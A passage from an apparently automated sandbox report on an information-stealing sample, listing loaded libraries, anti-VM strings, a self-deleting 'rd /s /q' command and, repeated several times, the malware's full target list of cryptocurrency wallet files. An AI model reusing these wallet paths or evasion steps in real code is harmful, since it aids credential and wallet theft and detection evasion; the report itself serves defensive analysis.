            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: ntshrui.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: cscapi.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: linkinfo.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\pyjnkasedf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: Google Drive.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: YouTube.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Sheets.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Gmail.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Slides.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Docs.lnk.9.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: pyjnkasedf.exeStatic PE information: section name: .00cfg
            Source: pyjnkasedf.exeStatic PE information: section name: .text entropy: 6.827864387265423

            Boot Survival

            barindex
            Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: pyjnkasedf.exeBinary or memory string: DIR_WATCH.DLL
            Source: pyjnkasedf.exeBinary or memory string: SBIEDLL.DLL
            Source: pyjnkasedf.exeBinary or memory string: API_LOG.DLL
            Source: pyjnkasedf.exeBinary or memory string: <EABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/%HSWPESPY.DLLAVGHOOKX.DLLSBIEDLL.DLLSNXHK.DLLVMCHECK.DLLDIR_WATCH.DLLAPI_LOG.DLLPSTOREC.DLLAVGHOOKA.DLLCMDVRT64.DLLCMDVRT32.DLLIMAGE/JPEGCHAININGMODEAESCHAININGMODEGCMABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=UNKNOWN EXCEPTIONBAD ALLOCATION4@
            Source: C:\Windows\SysWOW64\timeout.exe TID: 2828Thread sleep count: 87 > 30
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004022FC FindFirstFileA,0_2_004022FC
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00429305 FindFirstFileA,0_2_00429305
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00425791 FindFirstFileA,FindFirstFileA,0_2_00425791
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0043A85B FindFirstFileA,memset,memset,0_2_0043A85B
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00431951 FindFirstFileA,0_2_00431951
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00423AC1 FindFirstFileA,0_2_00423AC1
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00430C61 wsprintfA,wsprintfA,FindFirstFileA,0_2_00430C61
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00436D1E FindFirstFileA,0_2_00436D1E
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00426E63 FindFirstFileA,0_2_00426E63
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004024A9 FindFirstFileA,0_2_004024A9
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004288E9 FindFirstFileA,FindFirstFileA,0_2_004288E9
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042EE1F GetSystemInfo,wsprintfA,wsprintfA,0_2_0042EE1F
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\Jump to behavior
            Source: Web Data.15.drBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
            Source: Web Data.15.drBinary or memory string: tasks.office.comVMware20,11696501413o
            Source: Web Data.15.drBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
            Source: Web Data.15.drBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
            Source: Web Data.15.drBinary or memory string: dev.azure.comVMware20,11696501413j
            Source: Web Data.15.drBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmp, pyjnkasedf.exe, 00000000.00000002.2023659585.00000000008FC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: Web Data.15.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
            Source: Web Data.15.drBinary or memory string: bankofamerica.comVMware20,11696501413x
            Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
            Source: Web Data.15.drBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
            Source: Web Data.15.drBinary or memory string: turbotax.intuit.comVMware20,11696501413t
            Source: Web Data.15.drBinary or memory string: Interactive userers - HKVMware20,11696501413]
            Source: Web Data.15.drBinary or memory string: outlook.office.comVMware20,11696501413s
            Source: Web Data.15.drBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
            Source: pyjnkasedf.exe, 00000000.00000002.2023659585.000000000092E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: Web Data.15.drBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
            Source: Web Data.15.drBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
            Source: Web Data.15.drBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
            Source: pyjnkasedf.exe, 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: VMwareVMware
            Source: Web Data.15.drBinary or memory string: ms.portal.azure.comVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
            Source: Web Data.15.drBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
            Source: Web Data.15.drBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
            Source: Web Data.15.drBinary or memory string: global block list test formVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: outlook.office365.comVMware20,11696501413t
            Source: Web Data.15.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
            Source: Web Data.15.drBinary or memory string: interactiveuserers.comVMware20,11696501413
            Source: Web Data.15.drBinary or memory string: discord.comVMware20,11696501413f
            Source: Web Data.15.drBinary or memory string: AMC password management pageVMware20,11696501413
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_004015DF mov eax, dword ptr fs:[00000030h]0_2_004015DF
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_00401661 mov eax, dword ptr fs:[00000030h]0_2_00401661
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0040190C test dword ptr fs:[00000030h], 00000068h0_2_0040190C
            Source: C:\Users\user\Desktop\pyjnkasedf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EGCFHDAKECFI" & exitJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: GetLocaleInfoA,0_2_0042DF9F
            Source: C:\Users\user\Desktop\pyjnkasedf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042ED59 GetUserNameA,0_2_0042ED59
            Source: C:\Users\user\Desktop\pyjnkasedf.exeCode function: 0_2_0042D415 GetTimeZoneInformation,0_2_0042D415
            Source: C:\Users\user\Desktop\pyjnkasedf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: pyjnkasedf.exe PID: 7496, type: MEMORYSTR
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
            Source: pyjnkasedf.exe, 00000000.00000002.2026957320.0000000003CBA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local 